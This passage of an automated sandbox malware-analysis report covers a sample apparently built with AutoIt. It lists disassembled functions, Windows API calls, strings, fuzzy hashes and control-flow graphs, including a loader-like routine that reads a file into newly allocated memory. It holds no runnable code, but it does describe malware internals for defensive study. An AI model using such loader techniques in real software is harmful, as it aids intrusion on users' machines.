                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: FileFind$AttributesCloseFirst
                                                  • String ID:
                                                  • API String ID: 48322524-0
                                                  • Opcode ID: 7f0693936b45c5a014bf4f305c02a90846bcc8e31da802d1481b0bc1fc4bc8e7
                                                  • Instruction ID: 3f9aba85dfc89bcb4a157bd7f9b710667798209024e7ab9bb8507ed63a989566
                                                  • Opcode Fuzzy Hash: 7f0693936b45c5a014bf4f305c02a90846bcc8e31da802d1481b0bc1fc4bc8e7
                                                  • Instruction Fuzzy Hash: CDE0D8324284006F9220B738EC5D4EA775CEE17375F100715F939C14F0E7B06A509595
                                                  Function 0088E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • Variable must be of type 'Object'., xrefs: 008C428C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Variable must be of type 'Object'.
                                                  • API String ID: 0-109567571
                                                  • Opcode ID: 92a4270153059d27ed3b598fc79dbe7a54b61b1afc34f19d8e5b4519dd369018
                                                  • Instruction ID: 086cbaaaded56ce4e3d581d240ba040e98a35dcaa68a4519966f10e06ae3db18
                                                  • Opcode Fuzzy Hash: 92a4270153059d27ed3b598fc79dbe7a54b61b1afc34f19d8e5b4519dd369018
                                                  • Instruction Fuzzy Hash: A4A2B474A04219CFCB24EF98C480AADB7B1FF59314F248469E916EB352D771ED82CB91
                                                  Function 00890B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00890BBB
                                                  • timeGetTime.WINMM ref: 00890E76
                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00890FB3
                                                  • TranslateMessage.USER32(?), ref: 00890FC7
                                                  • DispatchMessageW.USER32(?), ref: 00890FD5
                                                  • Sleep.KERNEL32(0000000A), ref: 00890FDF
                                                  • LockWindowUpdate.USER32(00000000), ref: 0089105A
                                                  • DestroyWindow.USER32 ref: 00891066
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00891080
                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 008C52AD
                                                  • TranslateMessage.USER32(?), ref: 008C608A
                                                  • DispatchMessageW.USER32(?), ref: 008C6098
                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008C60AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                  • API String ID: 4003667617-3242690629
                                                  • Opcode ID: 5712d0f1d8866f8a5b304aeaa4b3f15982b97e810ba61fffee0b60207b4e2216
                                                  • Instruction ID: 6f47c092f7adc2afc7b5f4e30988f45ea88e566af365fe7948ff1d35d17878d5
                                                  • Opcode Fuzzy Hash: 5712d0f1d8866f8a5b304aeaa4b3f15982b97e810ba61fffee0b60207b4e2216
                                                  • Instruction Fuzzy Hash: 4BB28F70608741DFDB28EB24C894F6AB7E5FF85304F18491DE49AD72A1DB71E984CB82
                                                  Function 008E93DF Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 008E91E9: __time64.LIBCMT ref: 008E91F3
                                                    • Part of subcall function 00885045: _fseek.LIBCMT ref: 0088505D
                                                  • __wsplitpath.LIBCMT ref: 008E94BE
                                                    • Part of subcall function 008A432E: __wsplitpath_helper.LIBCMT ref: 008A436E
                                                  • _wcscpy.LIBCMT ref: 008E94D1
                                                  • _wcscat.LIBCMT ref: 008E94E4
                                                  • __wsplitpath.LIBCMT ref: 008E9509
                                                  • _wcscat.LIBCMT ref: 008E951F
                                                  • _wcscat.LIBCMT ref: 008E9532
                                                    • Part of subcall function 008E922F: _memmove.LIBCMT ref: 008E9268
                                                    • Part of subcall function 008E922F: _memmove.LIBCMT ref: 008E9277
                                                  • _wcscmp.LIBCMT ref: 008E9479
                                                    • Part of subcall function 008E99BE: _wcscmp.LIBCMT ref: 008E9AAE
                                                    • Part of subcall function 008E99BE: _wcscmp.LIBCMT ref: 008E9AC1
                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008E96DC
                                                  • _wcsncpy.LIBCMT ref: 008E974F
                                                  • DeleteFileW.KERNEL32(?,?), ref: 008E9785
                                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 008E979B
                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008E97AC
                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008E97BE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                  • String ID:
                                                  • API String ID: 1500180987-0
                                                  • Opcode ID: 90c62c2f127b8efd2b2b94edca3df1121b3d8868985427a9c64a31e95dda5587
                                                  • Instruction ID: f2d68174cc297901038ee72f245728a65e4dd410d671cdc1c8e41907d2a0f541
                                                  • Opcode Fuzzy Hash: 90c62c2f127b8efd2b2b94edca3df1121b3d8868985427a9c64a31e95dda5587
                                                  • Instruction Fuzzy Hash: 9CC11CB1D00219AEDF21DF99CC85ADEB7BDFF55310F0040AAF609E6251EB709A848F65
                                                  Function 008871EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00884864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009462F8,?,008837C0,?), ref: 00884882
                                                    • Part of subcall function 008A074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,008872C5), ref: 008A0771
                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00887308
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008BECF1
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008BED32
                                                  • RegCloseKey.ADVAPI32(?), ref: 008BED70
                                                  • _wcscat.LIBCMT ref: 008BEDC9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                  • API String ID: 2673923337-2727554177
                                                  • Opcode ID: 098f95b78dfda42222a79e26e960cf2389e2439f0e5d75bc63e79b4df8a38363
                                                  • Instruction ID: 414b6e48fd46bd72b4022598eab469549fabc9a0f876fe3cc599f0dfafe7cbd3
                                                  • Opcode Fuzzy Hash: 098f95b78dfda42222a79e26e960cf2389e2439f0e5d75bc63e79b4df8a38363
                                                  • Instruction Fuzzy Hash: C0715B7511C3059EC324EFA9D881CABB7F8FB86740B44492EF455C32A0EBB09948DB92
                                                  Function 00883A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00883A62
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00883A71
                                                  • LoadIconW.USER32(00000063), ref: 00883A88
                                                  • LoadIconW.USER32(000000A4), ref: 00883A9A
                                                  • LoadIconW.USER32(000000A2), ref: 00883AAC
                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00883AD2
                                                  • RegisterClassExW.USER32(?), ref: 00883B28
                                                    • Part of subcall function 00883041: GetSysColorBrush.USER32(0000000F), ref: 00883074
                                                    • Part of subcall function 00883041: RegisterClassExW.USER32(00000030), ref: 0088309E
                                                    • Part of subcall function 00883041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008830AF
                                                    • Part of subcall function 00883041: LoadIconW.USER32(000000A9), ref: 008830F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                  • String ID: #$0$AutoIt v3
                                                  • API String ID: 2880975755-4155596026
                                                  • Opcode ID: d4f2ba05abdf407f7bf1b82214f79dd41bbfdbf56ffd7f1fcb6f916e845faf84
                                                  • Instruction ID: df40e0142a417fc6fee6ed11a5b9b5914d0f3ee105b7b160fbfee4f257a3f3b2
                                                  • Opcode Fuzzy Hash: d4f2ba05abdf407f7bf1b82214f79dd41bbfdbf56ffd7f1fcb6f916e845faf84
                                                  • Instruction Fuzzy Hash: FF214DB5929308BFEB10DFA4EC19F9D7BB4FB0A711F000129E514E62A0D3B55654AF46
                                                  Function 00883778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                  • API String ID: 1825951767-3513169116
                                                  • Opcode ID: bb53c412eecc30f7fa1e9d0951183f9f0b4776f227494ee2f594553f8566e7f1
                                                  • Instruction ID: 612914fbd74f6a5e537aa7e687dd5b857ea40c9cbd290cb70931d0a9526e5bc7
                                                  • Opcode Fuzzy Hash: bb53c412eecc30f7fa1e9d0951183f9f0b4776f227494ee2f594553f8566e7f1
                                                  • Instruction Fuzzy Hash: 5BA14F75910229AACB14FBA8CC95DEEB778FF15700F540429F412F7191EF749A05CB62
                                                  Function 001025E0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 940 1025e0-10268e call 100000 943 102695-1026bb call 1034f0 CreateFileW 940->943 946 1026c2-1026d2 943->946 947 1026bd 943->947 952 1026d4 946->952 953 1026d9-1026f3 VirtualAlloc 946->953 948 10280d-102811 947->948 949 102853-102856 948->949 950 102813-102817 948->950 954 102859-102860 949->954 955 102823-102827 950->955 956 102819-10281c 950->956 952->948 957 1026f5 953->957 958 1026fa-102711 ReadFile 953->958 959 102862-10286d 954->959 960 1028b5-1028ca 954->960 961 102837-10283b 955->961 962 102829-102833 955->962 956->955 957->948 965 102713 958->965 966 102718-102758 VirtualAlloc 958->966 967 102871-10287d 959->967 968 10286f 959->968 969 1028da-1028e2 960->969 970 1028cc-1028d7 VirtualFree 960->970 963 10284b 961->963 964 10283d-102847 961->964 962->961 963->949 964->963 965->948 971 10275a 966->971 972 10275f-10277a call 103740 966->972 973 102891-10289d 967->973 974 10287f-10288f 967->974 968->960 970->969 971->948 980 102785-10278f 972->980 977 1028aa-1028b0 973->977 978 10289f-1028a8 973->978 976 1028b3 974->976 976->954 977->976 978->976 981 102791-1027c0 call 103740 980->981 982 1027c2-1027d6 call 103550 980->982 981->980 987 1027d8 982->987 988 1027da-1027de 982->988 987->948 990 1027e0-1027e4 CloseHandle 988->990 991 1027ea-1027ee 988->991 990->991 992 1027f0-1027fb VirtualFree 991->992 993 1027fe-102807 991->993 992->993 993->943 993->948
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 001026B1
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001028D7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.358795810.0000000000100000.00000040.00001000.00020000.00000000.sdmp, Offset: 00100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_100000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CreateFileFreeVirtual
                                                  • String ID:
                                                  • API String ID: 204039940-0
                                                  • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                  • Instruction ID: f9fb548fa3946d08bfc80d6777c59579a6a5222616c123c267797b163e967716
                                                  • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                  • Instruction Fuzzy Hash: 75A1F674E00209EBDB14CFA4C998BAEB7B5FF58304F208159E555BB2C0D7B99A81CF94
                                                  Function 008839E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1071 8839e7-883a57 CreateWindowExW * 2 ShowWindow * 2
                                                  APIs
                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00883A15
                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00883A36
                                                  • ShowWindow.USER32(00000000), ref: 00883A4A
                                                  • ShowWindow.USER32(00000000), ref: 00883A53
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$CreateShow
                                                  • String ID: AutoIt v3$edit
                                                  • API String ID: 1584632944-3779509399
                                                  • Opcode ID: 9db71cfde89f3d44930474eb2db5bc0540e67006e9609b7098df524f905c264d
                                                  • Instruction ID: b002539d82f0211c691fb1fa65c1fff7590ad12d698d34ae1fef628522557432
                                                  • Opcode Fuzzy Hash: 9db71cfde89f3d44930474eb2db5bc0540e67006e9609b7098df524f905c264d
                                                  • Instruction Fuzzy Hash: 16F03AB4665290BEEB3117276C18E273E7DE7C7F50B00012AB910E21B0C2E50800EAB2
                                                  Function 001023B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1072 1023b0-1024d7 call 100000 call 1022a0 CreateFileW 1079 1024d9 1072->1079 1080 1024de-1024ee 1072->1080 1081 10258e-102593 1079->1081 1083 1024f0 1080->1083 1084 1024f5-10250f VirtualAlloc 1080->1084 1083->1081 1085 102511 1084->1085 1086 102513-10252a ReadFile 1084->1086 1085->1081 1087 10252c 1086->1087 1088 10252e-102568 call 1022e0 call 1012a0 1086->1088 1087->1081 1093 102584-10258c ExitProcess 1088->1093 1094 10256a-10257f call 102330 1088->1094 1093->1081 1094->1093
                                                  APIs
                                                    • Part of subcall function 001022A0: Sleep.KERNELBASE(000001F4), ref: 001022B1
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001024CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.358795810.0000000000100000.00000040.00001000.00020000.00000000.sdmp, Offset: 00100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_100000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CreateFileSleep
                                                  • String ID: S3BHZIY1UKJ6DTUVS37LPNA1
                                                  • API String ID: 2694422964-3650088209
                                                  • Opcode ID: e24080019d8c28239e6f79ae11c974099497621ca9468431c599a7a99d7c1f09
                                                  • Instruction ID: 0665eeb9ea420e97d14d9ff9df3ba4662991080eed0f3e651a1f40b8932fd78d
                                                  • Opcode Fuzzy Hash: e24080019d8c28239e6f79ae11c974099497621ca9468431c599a7a99d7c1f09
                                                  • Instruction Fuzzy Hash: B0517130D04289DBEF11DBE4C859BEEBBB9AF15304F044199E2487B2C1D7B91B49CBA5
                                                  Function 0088410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1096 88410d-884123 1097 884129-88413e call 887b76 1096->1097 1098 884200-884204 1096->1098 1101 8bd5dd-8bd5ec LoadStringW 1097->1101 1102 884144-884164 call 887d2c 1097->1102 1105 8bd5f7-8bd60f call 887c8e call 887143 1101->1105 1102->1105 1106 88416a-88416e 1102->1106 1115 88417e-8841fb call 8a3020 call 88463e call 8a2ffc Shell_NotifyIconW call 885a64 1105->1115 1118 8bd615-8bd633 call 887e0b call 887143 call 887e0b 1105->1118 1108 884174-884179 call 887c8e 1106->1108 1109 884205-88420e call 8881a7 1106->1109 1108->1115 1109->1115 1115->1098 1118->1115
                                                  APIs
                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008BD5EC
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                  • _memset.LIBCMT ref: 0088418D
                                                  • _wcscpy.LIBCMT ref: 008841E1
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008841F1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                  • String ID: Line:
                                                  • API String ID: 3942752672-1585850449
                                                  • Opcode ID: e2a096bc8a19da58b930dd25fe0c25a92a332e33dcf39c70979eece1957cee86
                                                  • Instruction ID: ce68af2b9850af9c8c7c309ca72507e7d7d487adfc08885a0bb8ad44da7e3601
                                                  • Opcode Fuzzy Hash: e2a096bc8a19da58b930dd25fe0c25a92a332e33dcf39c70979eece1957cee86
                                                  • Instruction Fuzzy Hash: 9B3190B200C315AAE731FB68DC45FDB77E8FB56314F20461AB195D20A1EBB4A648C793
                                                  Function 008A564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1190 8a564d-8a5666 1191 8a5668-8a566d 1190->1191 1192 8a5683 1190->1192 1191->1192 1194 8a566f-8a5671 1191->1194 1193 8a5685-8a568b 1192->1193 1195 8a568c-8a5691 1194->1195 1196 8a5673-8a5678 call 8a8d68 1194->1196 1198 8a569f-8a56a3 1195->1198 1199 8a5693-8a569d 1195->1199 1204 8a567e call 8a8ff6 1196->1204 1202 8a56b3-8a56b5 1198->1202 1203 8a56a5-8a56b0 call 8a3020 1198->1203 1199->1198 1201 8a56c3-8a56d2 1199->1201 1207 8a56d9 1201->1207 1208 8a56d4-8a56d7 1201->1208 1202->1196 1206 8a56b7-8a56c1 1202->1206 1203->1202 1204->1192 1206->1196 1206->1201 1209 8a56de-8a56e3 1207->1209 1208->1209 1212 8a56e9-8a56f0 1209->1212 1213 8a57cc-8a57cf 1209->1213 1214 8a56f2-8a56fa 1212->1214 1215 8a5731-8a5733 1212->1215 1213->1193 1214->1215 1216 8a56fc 1214->1216 1217 8a579d-8a579e call 8b0df7 1215->1217 1218 8a5735-8a5737 1215->1218 1219 8a57fa 1216->1219 1220 8a5702-8a5704 1216->1220 1229 8a57a3-8a57a7 1217->1229 1222 8a575b-8a5766 1218->1222 1223 8a5739-8a5741 1218->1223 1228 8a57fe-8a5807 1219->1228 1226 8a570b-8a5710 1220->1226 1227 8a5706-8a5708 1220->1227 1224 8a576a-8a576d 1222->1224 1225 8a5768 1222->1225 1230 8a5743-8a574f 1223->1230 1231 8a5751-8a5755 1223->1231 1233 8a576f-8a577b call 8a4916 call 8b10ab 1224->1233 1234 8a57d4-8a57d8 1224->1234 1225->1224 1226->1234 1235 8a5716-8a572f call 8b0f18 1226->1235 1227->1226 1228->1193 1229->1228 1236 8a57a9-8a57ae 1229->1236 1232 8a5757-8a5759 1230->1232 1231->1232 1232->1224 1251 8a5780-8a5785 1233->1251 1238 8a57ea-8a57f5 call 8a8d68 1234->1238 1239 8a57da-8a57e7 call 8a3020 1234->1239 1250 8a5792-8a579b 1235->1250 1236->1234 1237 8a57b0-8a57c1 1236->1237 1242 8a57c4-8a57c6 1237->1242 1238->1204 1239->1238 1242->1212 1242->1213 1250->1242 1252 